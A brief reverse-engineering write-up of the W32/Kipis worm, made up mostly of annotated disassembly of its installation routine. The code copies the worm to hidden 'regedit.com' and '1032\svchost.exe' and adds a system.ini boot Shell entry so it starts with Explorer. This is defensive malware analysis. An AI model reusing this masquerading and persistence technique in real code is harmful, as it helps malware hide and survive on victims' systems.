W32/Kipis Worm

After unpacked; The entry point: .text:00401253 68 28 60 40 00 push offset dword_406028 .text:00401258 68 24 60 40 00 push offset dword_406024 .text:0040125D 68 20 60 40 00 push offset dword_406020 .text:00401262 E8 89 2E 00 00 call __GetMainArgs .text:00401267 FF 35 28 60 40 00 push dword_406028 .text:0040126D FF 35 24 60 40 00 push dword_406024 .text:00401273 FF 35 20 60 40 00 push dword_406020 .text:00401279 89 25 14 60 40 00 mov dword_406014, esp .text:0040127F E8 E4 2A 00 00 call sub_403D68 <--- call in .text:00403D68 E8 62 FE FF FF call sub_403BCF .text:00403D6D E8 55 FF FF FF call sub_403CC7 .text:00403D72 E8 0D FE FF FF call sub_403B84 .text:00403D77 E8 8D FF FF FF call sub_403D09 In the first call: This malware try to get the system directory and copy itself into the director as filename "regedit.com", Then create a directory 1032, copy itself to it as file "svchost.exe". Write profile string to system.ini The code :00403BD0 89 E5 mov ebp, esp .text:00403BD2 81 EC 10 04 00 00 sub esp, 410h .text:00403BD8 68 04 01 00 00 push 104h ; uSize .text:00403BDD 8D 85 FC FE FF FF lea eax, [ebp+PathName] .text:00403BE3 50 push eax ; lpBuffer .text:00403BE4 E8 8B 02 00 00 call GetSystemDirectoryA .text:00403BE9 68 04 01 00 00 push 104h ; uSize .text:00403BEE 8D 85 F8 FD FF FF lea eax, [ebp+FileName] .text:00403BF4 50 push eax ; lpBuffer .text:00403BF5 E8 9E 02 00 00 call GetWindowsDirectoryA .text:00403BFA 68 05 01 00 00 push 105h ; nSize .text:00403BFF 8D 85 F3 FC FF FF lea eax, [ebp+ExistingFileName] .text:00403C05 50 push eax ; lpFilename .text:00403C06 6A 00 push 0 ; hModule .text:00403C08 E8 43 02 00 00 call GetModuleFileNameA .text:00403C0D 68 6B 6C 40 00 push offset aRegedit_com ; "//regedit.com" .text:00403C12 8D 85 F8 FD FF FF lea eax, [ebp+FileName] .text:00403C18 50 push eax .text:00403C19 E8 82 03 00 00 call lstrcat .text:00403C1E 6A 00 push 0 ; bFailIfExists .text:00403C20 8D 85 F8 FD FF FF lea eax, [ebp+FileName] .text:00403C26 50 push eax ; lpNewFileName .text:00403C27 8D 85 F3 FC FF FF lea eax, [ebp+ExistingFileName] .text:00403C2D 50 push eax ; lpExistingFileName .text:00403C2E E8 7D 02 00 00 call CopyFileA .text:00403C33 6A 06 push 6 ; dwFileAttributes .text:00403C35 8D 85 F8 FD FF FF lea eax, [ebp+FileName] .text:00403C3B 50 push eax ; lpFileName .text:00403C3C E8 E7 02 00 00 call SetFileAttributesA .text:00403C41 68 65 6C 40 00 push offset a1032 ; "//1032" .text:00403C46 8D 85 FC FE FF FF lea eax, [ebp+PathName] .text:00403C4C 50 push eax .text:00403C4D E8 4E 03 00 00 call lstrcat .text:00403C52 6A 00 push 0 ; lpSecurityAttributes .text:00403C54 8D 85 FC FE FF FF lea eax, [ebp+PathName] .text:00403C5A 50 push eax ; lpPathName .text:00403C5B E8 8C 02 00 00 call CreateDirectoryA .text:00403C60 68 58 6C 40 00 push offset aSvchost_exe ; "//svchost.exe" .text:00403C65 8D 85 FC FE FF FF lea eax, [ebp+PathName] .text:00403C6B 50 push eax .text:00403C6C E8 2F 03 00 00 call lstrcat .text:00403C71 6A 00 push 0 ; bFailIfExists .text:00403C73 8D 85 FC FE FF FF lea eax, [ebp+PathName] .text:00403C79 50 push eax ; lpNewFileName .text:00403C7A 8D 85 F3 FC FF FF lea eax, [ebp+ExistingFileName] .text:00403C80 50 push eax ; lpExistingFileName .text:00403C81 E8 2A 02 00 00 call CopyFileA .text:00403C86 68 4A 6C 40 00 push offset aExplorer_exe ; "Explorer.exe " .text:00403C8B 8D 85 F3 FB FF FF lea eax, [ebp+String] .text:00403C91 50 push eax .text:00403C92 E8 21 03 00 00 call lstrcpy .text:00403C97 8D 85 FC FE FF FF lea eax, [ebp+PathName] .text:00403C9D 50 push eax .text:00403C9E 8D 85 F3 FB FF FF lea eax, [ebp+String] .text:00403CA4 50 push eax .text:00403CA5 E8 F6 02 00 00 call lstrcat .text:00403CAA 68 34 6C 40 00 push offset FileName ; "system.ini" .text:00403CAF 8D 85 F3 FB FF FF lea eax, [ebp+String] .text:00403CB5 50 push eax ; lpString .text:00403CB6 68 3F 6C 40 00 push offset KeyName ; "Shell" .text:00403CBB 68 45 6C 40 00 push offset AppName ; "boot" .text:00403CC0 E8 CF 02 00 00 call WritePrivateProfileStringA